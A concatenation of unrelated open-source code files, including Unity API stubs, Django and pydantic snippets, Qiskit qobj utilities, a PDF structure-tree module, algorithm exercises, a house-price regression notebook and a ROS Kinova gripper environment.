:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def GetETC1SupportedCanvasMaterial():
'''
:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def ForceUpdateCanvases():
pass
@staticmethod
def get_enabled():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_enabled(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_transform():
'''
:returns: Transform
:rtype: UnityEngine.Transform
'''
pass
@staticmethod
def get_gameObject():
'''
:returns: GameObject
:rtype: UnityEngine.GameObject
'''
pass
@staticmethod
@overload
def GetComponent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
@overload
def GetComponent(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponent(arg1=None):
pass
@staticmethod
@overload
def GetComponentInChildren(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
@overload
def GetComponentInChildren(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponentInChildren(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1, arg2):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
:param arg2: Undefined variable
:type arg2: ListT.ListT
'''
pass
@staticmethod
@overload
def GetComponentsInChildren(arg1):
'''
:param arg1: Undefined variable
:type arg1: ListT.ListT
'''
pass
@staticmethod
def GetComponentsInChildren(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponentInParent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponentInParent(arg1=None):
pass
@staticmethod
@overload
def GetComponentsInParent(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInParent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponentsInParent(arg1, arg2):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
:param arg2: Undefined variable
:type arg2: ListT.ListT
'''
pass
@staticmethod
def GetComponentsInParent(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetComponents(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: ComponentArray
:rtype: UnityEngine.ComponentArray
'''
pass
@staticmethod
@overload
def GetComponents(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def GetComponents(arg1):
'''
:param arg1: Undefined variable
:type arg1: ListT.ListT
'''
pass
@staticmethod
def GetComponents(arg1=None, arg2=None):
pass
@staticmethod
def GetInstanceID():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def GetHashCode():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def Equals(arg1):
'''
:param arg1: Object
:type arg1: System.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def get_name():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def set_name(arg1):
'''
:param arg1: String
:type arg1: System.String or str
'''
pass
@staticmethod
def ToString():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def GetType():
'''
:returns: Type
:rtype: System.Type
'''
pass
|
StarcoderdataPython
|
3284583
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.http.response import Http404
def restrict_for_museum(func):
def view(request, *args, **kwargs):
if request.user.is_authenticated() and request.user.profile.is_museum:
raise Http404()
return func(request, *args, **kwargs)
return view
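# Usage sketch (added for illustration; `artwork_list` is a hypothetical view, not
# part of this project): authenticated museum profiles get a 404, everyone else
# receives the normal response.
from django.http import HttpResponse


@restrict_for_museum
def artwork_list(request):
    return HttpResponse("visible to non-museum users only")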
|
StarcoderdataPython
|
4805830
|
<filename>backend/app/schemas/chat/messages.py
"""Message schemas."""
from datetime import datetime
from pydantic import BaseModel, Field
from ..base import MongoModel, MongoId
class Message(BaseModel):
"""Base Message schema."""
text: str
class MessageIn(Message):
"""Input Message schema."""
class MessageOut(MongoModel, Message):
"""Output Message schema."""
table_id: MongoId
user_id: MongoId
created_at: datetime
class MessageDB(MessageOut):
"""Database Message schema."""
created_at: datetime = Field(default_factory=datetime.utcnow)
|
StarcoderdataPython
|
60216
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utilities related to Qobj."""
from typing import Dict, Any, Optional, Union, List
from qiskit.qobj import QobjHeader, QasmQobj, PulseQobj
def _serialize_noise_model(config: Dict[str, Any]) -> Dict[str, Any]:
"""Traverse the dictionary looking for ``noise_model`` keys and apply
a transformation so it can be serialized.
Args:
config: The dictionary to traverse.
Returns:
The transformed dictionary.
"""
for k, v in config.items():
if isinstance(config[k], dict):
_serialize_noise_model(config[k])
else:
if k == 'noise_model':
try:
config[k] = v.to_dict(serializable=True)
except AttributeError:
# if .to_dict() fails is probably because the noise_model
# has been already transformed elsewhere
pass
return config
def update_qobj_config(
qobj: Union[QasmQobj, PulseQobj],
backend_options: Optional[Dict] = None,
noise_model: Any = None
) -> Union[QasmQobj, PulseQobj]:
"""Update a ``Qobj`` configuration from backend options and a noise model.
Args:
qobj: Description of the job.
backend_options: Backend options.
noise_model: Noise model.
Returns:
The updated ``Qobj``.
"""
config = qobj.config.to_dict()
# Append backend options to configuration.
if backend_options:
for key, val in backend_options.items():
config[key] = val
# Append noise model to configuration. Overwrites backend option
if noise_model:
config['noise_model'] = noise_model
# Look for noise_models in the config, and try to transform them
config = _serialize_noise_model(config)
# Update the Qobj configuration.
qobj.config = QobjHeader.from_dict(config)
return qobj
def dict_to_qobj(qobj_dict: Dict) -> Union[QasmQobj, PulseQobj]:
"""Convert a Qobj in dictionary format to an instance.
Args:
qobj_dict: Qobj in dictionary format.
Returns:
The corresponding QasmQobj or PulseQobj instance.
"""
if qobj_dict['type'] == 'PULSE':
_decode_pulse_qobj(qobj_dict) # Convert to proper types.
return PulseQobj.from_dict(qobj_dict)
return QasmQobj.from_dict(qobj_dict)
def _decode_pulse_qobj(pulse_qobj: Dict) -> None:
"""Decode a pulse Qobj.
Args:
pulse_qobj: Qobj to be decoded.
"""
pulse_library = pulse_qobj['config']['pulse_library']
for lib in pulse_library:
lib['samples'] = [_to_complex(sample) for sample in lib['samples']]
for exp in pulse_qobj['experiments']:
for instr in exp['instructions']:
if 'val' in instr:
instr['val'] = _to_complex(instr['val'])
if 'parameters' in instr and 'amp' in instr['parameters']:
instr['parameters']['amp'] = _to_complex(instr['parameters']['amp'])
def _to_complex(value: Union[List[float], complex]) -> complex:
"""Convert the input value to type ``complex``.
Args:
value: Value to be converted.
Returns:
Input value in ``complex``.
Raises:
TypeError: If the input value is not in the expected format.
"""
if isinstance(value, list) and len(value) == 2:
return complex(value[0], value[1])
elif isinstance(value, complex):
return value
raise TypeError("{} is not in a valid complex number format.".format(value))
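# Minimal illustration (added for clarity, not part of Qiskit itself): `_to_complex`
# accepts either a two-element [real, imag] list or an existing complex value.
if __name__ == '__main__':
    assert _to_complex([1.0, -2.0]) == complex(1.0, -2.0)
    assert _to_complex(3 + 4j) == 3 + 4j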
|
StarcoderdataPython
|
1700097
|
# Copyright (c) 2012 <NAME>, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from multiconf.repeatable import Repeatable
from multiconf import ConfigItem, ConfigBuilder
def check_containment(start_item, level=0, prefix=" "):
for key, item in start_item.iteritems():
if isinstance(item, Repeatable):
for _rkey, ritem in item.iteritems():
check_containment(ritem, level+1, "R ")
if isinstance(item, ConfigItem) and not isinstance(item, ConfigBuilder):
assert id(item.contained_in) == id(start_item), \
"item.contained_in: " + repr(id(item.contained_in)) + ('name=' + item.contained_in.name if hasattr(item.contained_in, 'name') else '') + \
repr(type(item.contained_in)) + \
", start_item: " + repr(id(start_item)) + ('name=' + start_item.name if hasattr(start_item, 'name') else '') + \
repr(type(start_item))
check_containment(item, level+1)
|
StarcoderdataPython
|
99900
|
#stupid hacky stuff
logging = 0
exec(open("./wordle-evaluator.py").read())
hardMode = False
def load_freq():
with open('unigram_freq.csv') as f:
freq = {}
f.readline()
for line in f:
freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1])
return freq
def add_freq():
with open('unigram_freq.csv') as f:
freq = {}
f.readline()
for line in f:
freq[line.split(',')[0].strip().upper()] = int(line.split(',')[1])
file = open('wordle-guesses.txt', 'r')
wfile = open('wordle-g-freq.csv', 'w')
for l in file:
if l.strip() in freq.keys():
wfile.write(l.strip() + "," + str(freq[l.strip()]) + '\n')
else:
wfile.write(l.strip() + ",0\n")
def transform(s):
s = s.replace(":black_large_square:", "X")
s = s.replace(":white_large_square:", "X")
s = s.replace(":large_green_square:", "G")
s = s.replace(":large_yellow_square:", "Y")
s = s.replace("⬛", "X")
s = s.replace("⬜", "X")
s = s.replace("🟨", "Y")
s = s.replace("🟩", "G")
return s
def loadGuesses(answer):
logging.info("Loading answer tables")
freq = load_freq()
results = {}
last_pos = 0
with open("gamut.csv", "r") as g:
for l in g:
ls = l.split(",")
gAnswer = ls[0]
if gAnswer == answer:
gGuess = ls[1]
gResult = ls[2]
t = results.setdefault(gResult, [])
t.append((gGuess,freq.setdefault(gGuess, 0)))
return (results)
def loadSequence(filename, answer):
gamut = loadGuesses(answer)
with open(filename) as f:
l = f.readline()
if not l.startswith("Wordle"):
logging.info("This is not a Wordle share file.")
quit()
if l.count('X/6') > 0:
logging.info("Cannot process non-winning sequences.")
quit()
if l.count('*') > 0:
hardMode = True
for a in f:
h = transform(a).strip().upper()
print(gamut[h])
loadSequence("share.txt","QUERY")
|
StarcoderdataPython
|
3285913
|
import json
from . import geo, date, data, calc
geo = geo
date = date
data = data
calc = calc
# Outputs JSON for the given dictionary or list to the given path.
def save_json(x, path, quiet=False): # pragma: no cover
with open(path, 'w+') as output_file:
output_file.write(json.dumps(x, separators=(',', ':')))
if not quiet:
print(f'Saved {path}')
# Returns only the unique elements in a list
def unique(l):
unique_list = []
for item in l:
if item not in unique_list:
unique_list.append(item)
return unique_list
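# Example (added for clarity): unlike converting to a set, unique() preserves the
# first-seen order, e.g. unique([3, 1, 3, 2, 1]) -> [3, 1, 2].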
|
StarcoderdataPython
|
64048
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""Demo236_House_Preprocessed.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1D-6jwkEPkq3S7AiHnSH2SYp6FJPGArlF
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from itertools import product
"""## Get Dataset"""
def get_regression(X, y, regressors,texts):
f, axarr = plt.subplots(2,2, sharex='col', sharey='row', figsize=(10, 8))
for idx, clf, tt in zip(product([0, 1], [0, 1]),
regressors,
texts):
y_pred = clf.predict(np.sort(X_test.reshape(-1)).reshape(-1,1))
axarr[idx[0], idx[1]].plot(np.sort(X_test.reshape(-1)).reshape(-1,1), y_pred)
axarr[idx[0], idx[1]].scatter(X, y, c=y,
s=20, edgecolor='k')
axarr[idx[0], idx[1]].set_title(tt)
plt.show()
def report_regression( X, y,regressors,texts):
from sklearn.metrics import mean_squared_error as mse
results = {}
for clf, tt in zip( regressors,
texts):
y_pred = clf.predict(X)
results[tt] = mse(y, y_pred)
return results
from google.colab import drive
drive.mount("/content/gdrive")
data = pd.read_csv('/content/gdrive/My Drive/Colab Notebooks/FeatureSelection/train_house.csv')
data.keys()
y = data.SalePrice
X = data.drop(columns=['SalePrice'])
X.dtypes
X['SaleCondition'].dtype
objs = []
nums = []
for i in X.columns:
if X[i].dtype == 'O':
objs.append(i)
else:
nums.append(i)
na_objs = []
na_nums = []
for i in X.columns:
if (X[i].isnull().sum() > 0):
print(i, " ", X[i].isnull().sum())
if X[i].dtype == 'O':
na_objs.append(i)
else:
na_nums.append(i)
na_nums
na_objs
def impute(df, columns, dft):
df_temp = df.copy()
for column in columns:
df_temp[column] = df_temp[column].apply(lambda x: np.random.choice(dft[column].dropna().values) if pd.isnull(x) else x)
return df_temp
X = impute(X,na_nums + na_objs , X)
X.isnull().sum()
X.head()
for col in objs:
mapper = {k:i for i, k in enumerate(X[col].unique(), 0)}
X[col] = X[col].map(mapper)
X.head()
objs_oh = []
for col in objs:
if len(X[col].unique())>2:
objs_oh.append(col)
objs_oh
len(X.columns)
for i in objs_oh:
X = pd.concat([X, pd.get_dummies(X[i], prefix = i, drop_first=True)], axis=1)
X = X.drop(columns=objs_oh)
len(X.columns)
# from sklearn.decomposition import PCA
# obj = PCA()
# X = obj.fit_transform(X)
# TRAIN TEST SPLIT
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
from sklearn.tree import DecisionTreeRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
regressors = [
DecisionTreeRegressor().fit(X_train, y_train),
KNeighborsRegressor().fit(X_train, y_train),
SVR(gamma=.1, kernel='rbf').fit(X_train, y_train),
RandomForestRegressor().fit(X_train, y_train)
]
texts = [ "DecisionTreeRegressor",
"KNeighborsRegressor",
"SVR",
"RandomForestRegressor"]
# get_regression(X_test, y_test, regressors, texts)
report = report_regression( X_test, y_test,regressors,texts)
report
keys = list(report.keys())
vals = [float(report[k]) for k in keys]
sns.barplot(x=keys, y=vals)
|
StarcoderdataPython
|
1681404
|
class Solution:
def countVowelStrings(self, n: int) -> int:
dp = [[i for i in range(5,0,-1)] for _ in range(n)]
for i in range(1,n):
for j in range(3,-1,-1):
dp[i][j] = dp[i - 1][j] + dp[i][j + 1]
return dp[n-1][0]
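# Sanity check (added for illustration): there are 5 sorted vowel strings of
# length 1 ("a", "e", "i", "o", "u") and 15 of length 2 ("aa", "ae", ..., "uu").
if __name__ == "__main__":
    assert Solution().countVowelStrings(1) == 5
    assert Solution().countVowelStrings(2) == 15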
|
StarcoderdataPython
|
1629092
|
import sys
import argparse
import pandas as pd
import numpy as np
parser = argparse.ArgumentParser(description='Create dummy reference data.')
parser.add_argument('--items',
help='Input csv with items. default: %(default)s',
metavar='<name>',
default='items.csv')
parser.add_argument('--case_ids',
help='Input txt with case ids. default: %(default)s',
metavar='<name>',
default='case_ids.txt')
parser.add_argument('--reference',
help='Output reference csv. default: %(default)s',
metavar='<name>',
default='reference.csv')
args = parser.parse_args()
df_items = pd.read_csv(args.items,
dtype=str,
keep_default_na=False,
na_values=[],
encoding='cp932')
with open(args.case_ids) as f:
case_ids = f.read().splitlines()
data = np.random.randint(0, 100, (len(case_ids), len(df_items)))
df_ref = pd.DataFrame(data, columns=df_items['id'], index=case_ids)
df_ref.index.name = 'id'
df_ref.to_csv(args.reference, encoding='cp932')
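# Example invocation (illustrative; the script name is an assumption, the file
# names are simply the argparse defaults above):
#   python make_reference.py --items items.csv --case_ids case_ids.txt --reference reference.csv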
|
StarcoderdataPython
|
109565
|
import math
def buildSparseTable(arr, n):
for i in range(0, n):
lookup[i][0] = arr[i]
j = 1
while (1 << j) <= n:
i = 0
while (i + (1 << j) - 1) < n:
if (lookup[i][j - 1] <
lookup[i + (1 << (j - 1))][j - 1]):
lookup[i][j] = lookup[i][j - 1]
else:
lookup[i][j] = lookup[i + (1 << (j - 1))][j - 1]
i += 1
j += 1
def query(L, R):
j = int(math.log2(R - L + 1))
if lookup[L][j] <= lookup[R - (1 << j) + 1][j]:
return lookup[L][j]
else:
return lookup[R - (1 << j) + 1][j]
if __name__ == "__main__":
a = [7, 2, 3, 0, 5, 10, 3, 12, 18]
n = len(a)
MAX = 500
lookup = [[0 for i in range(MAX)] for j in range(MAX)]
buildSparseTable(a, n)
print(query(0, 4))
print(query(4, 7))
print(query(7, 8))
|
StarcoderdataPython
|
74694
|
"""
Project Euler Problem 174: https://projecteuler.net/problem=174
We shall define a square lamina to be a square outline with a square "hole" so that
the shape possesses vertical and horizontal symmetry.
Given eight tiles it is possible to form a lamina in only one way: 3x3 square with a
1x1 hole in the middle. However, using thirty-two tiles it is possible to form two
distinct laminae.
If t represents the number of tiles used, we shall say that t = 8 is type L(1) and
t = 32 is type L(2).
Let N(n) be the number of t ≤ 1000000 such that t is type L(n); for example,
N(15) = 832.
What is ∑ N(n) for 1 ≤ n ≤ 10?
"""
from collections import defaultdict
from math import ceil, sqrt
def solution(t_limit: int = 1000000, n_limit: int = 10) -> int:
"""
Return the sum of N(n) for 1 <= n <= n_limit.
>>> solution(1000,5)
249
>>> solution(10000,10)
2383
"""
count: defaultdict = defaultdict(int)
for outer_width in range(3, (t_limit // 4) + 2):
if outer_width * outer_width > t_limit:
hole_width_lower_bound = max(
ceil(sqrt(outer_width * outer_width - t_limit)), 1
)
else:
hole_width_lower_bound = 1
hole_width_lower_bound += (outer_width - hole_width_lower_bound) % 2
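# The hole must have the same parity as the outer square so the border thickness
# (outer_width - hole_width) / 2 is an integer; each valid pair contributes one lamina
# built from t = outer_width**2 - hole_width**2 tiles.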
for hole_width in range(hole_width_lower_bound, outer_width - 1, 2):
count[outer_width * outer_width - hole_width * hole_width] += 1
    return sum(1 for n in count.values() if 1 <= n <= n_limit)
if __name__ == "__main__":
print(f"{solution() = }")
|
StarcoderdataPython
|
3336475
|
<gh_stars>0
import click
@click.command()
@click.option('--name', default="world", help="Name to use when printing 'hello'")
def main(name):
click.echo("Hello %s" % name)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
13544
|
# created by <NAME>
# 7/8/16
import classes as c
def printIntro():
print 'Welcome to the\n'
print '''__/\\\\\\\\\\\\\\\\\\\\\\\\_________________________________________________\
__________________________\n _\\/\\\\\\////////\\\\\\___________________________________\
______________________________________\n _\\/\\\\\\______\\//\\\\\\___________________\
___________________________________________/\\\\\\______\n _\\/\\\\\\_______\\/\\\\\
\\_____/\\\\\\\\\\\\\\\\___/\\\\\\\\\\\\\\\\\\\\_____/\\\\\\\\\\\\\\\\___/\\\\/\\\\\\\\\\\
\\\\___/\\\\\\\\\\\\\\\\\\\\\\_\n _\\/\\\\\\_______\\/\\\\\\___/\\\\\\/////\\\\\\_\
\\/\\\\\\//////____/\\\\\\/////\\\\\\_\\/\\\\\\/////\\\\\\_\\////\\\\\\////__\n \
_\\/\\\\\\_______\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\__\\/\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\\\
\\\\\\\\\\\\__\\/\\\\\\___\\///_____\\/\\\\\\______\n _\\/\\\\\\_______/\\\\\\\
__\\//\\\\///////___\\////////\\\\\\_\\//\\\\///////___\\/\\\\\\____________\\/\\\\\\_/\\\
\\__\n _\\/\\\\\\\\\\\\\\\\\\\\\\\\/____\\//\\\\\\\\\\\\\\\\\\\\__/\\\\\\\\\
\\\\\\\\\\\\__\\//\\\\\\\\\\\\\\\\\\\\_\\/\\\\\\____________\\//\\\\\\\\\\___\n \
_\\////////////_______\\//////////__\\//////////____\\//////////__\\///____________\
__\\//\///____'''
print
print 'created by <NAME>\n'
def getUname():
done = False
while not done:
uname = raw_input("Enter your name: ")
if set(uname) <= set('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'):
if len(uname) <= 40:
done = True
else:
print 'Please keep your name to 40 letters or less'
else:
print 'Please use only letters in your name'
return uname
def createPlayer(name):
#c.Person(mainp [main character or not], name, weight, health, xp)
return c.Person(True, name, 150, 10, 100, 0)
def printIntro1(player):
msg = """==================================================
Welcome to the desert, %s.
"To survival." *clink*
"""
print msg % player.getName()
|
StarcoderdataPython
|
3277816
|
<reponame>LourencoFernando/SMS-Project
"""
Quoting the PDF spec:
> PDF’s logical _structure facilities_ provide a mechanism for incorporating
> structural information about a document’s content into a PDF file.
> The logical structure of a document is described by a hierarchy of objects called
> the _structure hierarchy_ or _structure tree_.
> At the root of the hierarchy is a dictionary object called the _structure tree root_,
> located by means of the **StructTreeRoot** entry in the document catalog.
"""
from collections import defaultdict
from typing import NamedTuple, List, Optional, Union
from .syntax import PDFObject, PDFString, PDFArray
# pylint: disable=inherit-non-class,unsubscriptable-object
class MarkedContent(NamedTuple):
page_object_id: int # refers to the first page displaying this marked content
struct_parents_id: int
struct_type: str
mcid: Optional[int] = None
title: Optional[str] = None
alt_text: Optional[str] = None
class NumberTree(PDFObject):
"""A number tree is similar to a name tree, except that its keys are integers
instead of strings and are sorted in ascending numerical order.
A name tree serves a similar purpose to a dictionary—associating keys and
values—but by different means.
The values associated with the keys may be objects of any type. Stream objects
are required to be specified by indirect object references. It is recommended,
though not required, that dictionary, array, and string objects be specified by
indirect object references, and other PDF objects (nulls, numbers, booleans,
and names) be specified as direct objects
"""
__slots__ = ("_id", "nums")
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.nums = defaultdict(list) # {struct_parent_id -> struct_elems}
def serialize(self, fpdf=None, obj_dict=None):
newline = "\n"
serialized_nums = "\n".join(
f"{struct_parent_id} [{newline.join(struct_elem.ref for struct_elem in struct_elems)}]"
for struct_parent_id, struct_elems in self.nums.items()
)
return super().serialize(fpdf, {"/Nums": f"[{serialized_nums}]"})
class StructTreeRoot(PDFObject):
__slots__ = ("_id", "type", "parent_tree", "k")
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.type = "/StructTreeRoot"
# A number tree used in finding the structure elements to which content items belong:
self.parent_tree = NumberTree()
# The immediate child or children of the structure tree root in the structure hierarchy:
self.k = PDFArray()
class StructElem(PDFObject):
# The main reason to use __slots__ in PDFObject child classes is to save up some memory
# when very many instances of this class are created.
__slots__ = ("_id", "type", "s", "p", "k", "pg", "t", "alt")
def __init__(
self,
struct_type: str,
parent: PDFObject,
kids: Union[List[int], List["StructElem"]],
page: PDFObject = None,
title: str = None,
alt: str = None,
**kwargs,
):
super().__init__(**kwargs)
self.type = "/StructElem"
self.s = (
struct_type # a name object identifying the nature of the structure element
)
self.p = parent # The structure element that is the immediate parent of this one in the structure hierarchy
self.k = PDFArray(kids) # The children of this structure element
self.pg = page # A page object on which some or all of the content items designated by the K entry are rendered
self.t = (
None if title is None else PDFString(title)
) # a text string representing it in human-readable form
self.alt = (
None if alt is None else PDFString(alt)
) # An alternate description of the structure element in human-readable form
class StructureTreeBuilder:
def __init__(self):
"""
Args:
marked_contents (tuple): list of MarkedContent
"""
self.struct_tree_root = StructTreeRoot()
self.doc_struct_elem = StructElem(
struct_type="/Document", parent=self.struct_tree_root, kids=[]
)
self.struct_tree_root.k.append(self.doc_struct_elem)
self.struct_elem_per_mc = {}
def add_marked_content(self, marked_content):
page = PDFObject(marked_content.page_object_id)
struct_elem = StructElem(
struct_type=marked_content.struct_type,
parent=self.doc_struct_elem,
kids=[] if marked_content.mcid is None else [marked_content.mcid],
page=page,
title=marked_content.title,
alt=marked_content.alt_text,
)
self.struct_elem_per_mc[marked_content] = struct_elem
self.doc_struct_elem.k.append(struct_elem)
self.struct_tree_root.parent_tree.nums[marked_content.struct_parents_id].append(
struct_elem
)
def next_mcid_for_page(self, page_object_id):
return sum(
1 for mc in self.struct_elem_per_mc if mc.page_object_id == page_object_id
)
def empty(self):
return not self.struct_elem_per_mc
def serialize(self, first_object_id=1, fpdf=None):
"""
Assign object IDs & output the whole hierarchy tree serialized
as a multi-line string in PDF syntax, ready to be embedded.
Object ID assignment will start with the provided first ID,
which will be assigned to the StructTreeRoot.
Apart from that, assignment is made in an arbitrary order.
All PDF objects must have assigned IDs before proceeding to output
generation though, as they have many references to each other.
If an FPDF instance is provided, its `_newobj` & `_out` methods will be called
and this method's output will be meaningless.
"""
self.assign_ids(first_object_id)
output = []
output.append(self.struct_tree_root.serialize(fpdf))
output.append(self.doc_struct_elem.serialize(fpdf))
output.append(self.struct_tree_root.parent_tree.serialize(fpdf))
for struct_elem in self.doc_struct_elem.k:
output.append(struct_elem.serialize(fpdf))
return "\n".join(output)
def assign_ids(self, n):
self.struct_tree_root.id = n
n += 1
self.doc_struct_elem.id = n
n += 1
self.struct_tree_root.parent_tree.id = n
n += 1
for struct_elem in self.doc_struct_elem.k:
struct_elem.id = n
n += 1
return n
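# Minimal usage sketch (illustrative only, not taken from the fpdf2 documentation):
# one MarkedContent is registered per tagged content item, then the whole hierarchy is
# serialized with object IDs starting at the chosen first ID, e.g.
#   builder = StructureTreeBuilder()
#   builder.add_marked_content(
#       MarkedContent(page_object_id=3, struct_parents_id=0, struct_type="/P", mcid=0)
#   )
#   pdf_syntax = builder.serialize(first_object_id=1)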
|
StarcoderdataPython
|
3217197
|
#!/usr/bin/env python3
###############
# Author: Paresh
# Purpose: Simulation to Real Implementation on Kinova
# Summer 2020
###############
import numpy as np
import math
import matplotlib.pyplot as plt
import time
import os, sys
from scipy.spatial.transform import Rotation as R
import random
import pickle
import pdb
import torch
import torch.nn as nn
import torch.nn.functional as F
import xml.etree.ElementTree as ET
from classifier_network import LinearNetwork, ReducedLinearNetwork
import re
from scipy.stats import triang
import rospy
from sensor_msgs.msg import JointState
from kinova_msgs.msg import FingerPosition, KinovaPose
from kinova_path_planning import MoveRobot
from geometry_msgs.msg import PoseStamped
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class KinovaGripper_Env:
def __init__(self):
self.kinova_rob = MoveRobot()
self.joint_states = JointState()
self.finger_pos = FingerPosition()
self.reward = 0
self.object_pose = KinovaPose()
self.Grasp_Reward = False
self.wrist_pose = np.zeros(3) # The wrist position in world coordinates; since we are using local coordinates it is 0
###Grasp Classifier###
self.Grasp_net = LinearNetwork().to(device)
trained_model = "path to model"
model = torch.load(trained_model)
self.Grasp_net.load_state_dict(model)
self.Grasp_net.eval()
###Subscribers###
self.joint_state_sub = rospy.Subscriber('/j2s7s300_driver/out/joint_state', JointState, self.joint_state_callback, queue_size=1)
self.finger_sub = rospy.Subscriber('/j2s7s300_driver/out/finger_position', FingerPosition, self.finger_state_callback, queue_size=1)
self.object_pose_sub = rospy.Subscriber('Object pose topic', KinovaPose, self.object_pose_callback, queue_size=1)
###Publisher###
self.finger_command_pub = rospy.Publisher('/sim2real/finger_command', FingerPosition, queue_size=1)
self.joint_angle_command_pub = rospy.Publisher('/sim2real/joint_angle_command', JointState, queue_size=1)
### Finger Position in Radians ###
def get_joint_states(self):
temp = list(self.joint_states.position)
finger_joint_state_value = [0, 0, 0]
finger_joint_state_value[0] = temp[7]
finger_joint_state_value[1] = temp[8]
finger_joint_state_value[2] = temp[9]
return finger_joint_state_value
def get_obj_pose(self):
return self.object_pose
# Function to return the angles between the palm normal and the object location
def get_angles(self):
obj_pose = self.get_obj_pose() #x, y, z
#self._get_trans_mat_wrist_pose()
local_obj_pos=np.copy(obj_pose)
local_obj_pos=np.append(local_obj_pos,1)
obj_wrist = local_obj_pos[0:3]/np.linalg.norm(local_obj_pos[0:3])
center_line = np.array([0,1,0])
z_dot = np.dot(obj_wrist[0:2],center_line[0:2])
z_angle = np.arccos(z_dot/np.linalg.norm(obj_wrist[0:2]))
x_dot = np.dot(obj_wrist[1:3],center_line[1:3])
x_angle = np.arccos(x_dot/np.linalg.norm(obj_wrist[1:3]))
return x_angle,z_angle
# Function to get rewards based only on the lift reward. This is primarily used to generate data for the grasp classifier
def get_reward_DataCollection(self):
obj_target = 0.2
obs = self.get_obs()
lift = rospy.get_param('Goal')
if lift:
lift_reward = 1
done = True
elif obs[5]>obj_target+0.05:
lift_reward=0.0
done=True
else:
lift_reward = 0
done = False
return lift_reward, {}, done
# Function to get rewards for RL training
def get_reward(self):
# object height target
obj_target = 0.2
# Grasp reward
grasp_reward = 0.0
obs = self.get_obs()
network_inputs=obs
inputs = torch.FloatTensor(np.array(network_inputs)).to(device)
#if np.max(np.array(obs[41:47])) < 0.035 or np.max(np.array(obs[35:41])) < 0.015:
outputs = self.Grasp_net(inputs).cpu().data.numpy().flatten()
if (outputs >=0.3) & (not self.Grasp_Reward):
grasp_reward = 5.0
self.Grasp_Reward=True
else:
grasp_reward = 0.0
lift = rospy.get_param('Goal')
if lift:
lift_reward = 50.0
done = True
else:
lift_reward = 0.0
done = False
finger_reward = -np.sum((np.array(obs[41:47])) + (np.array(obs[35:41]))) #Distance between finger and object
reward = 0.2*finger_reward + lift_reward + grasp_reward
return reward, {}, done
# Function to get the dimensions of the object
def get_obj_size(self):
return rospy.get_param('Object_size')
# Function to place the object at a random position near the hand with a probability density designed to create more difficult grasps
#def randomize_initial_pose(self, collect_data, size, shape): #This will get fixed by Stephanie
# return rand_x, rand_y
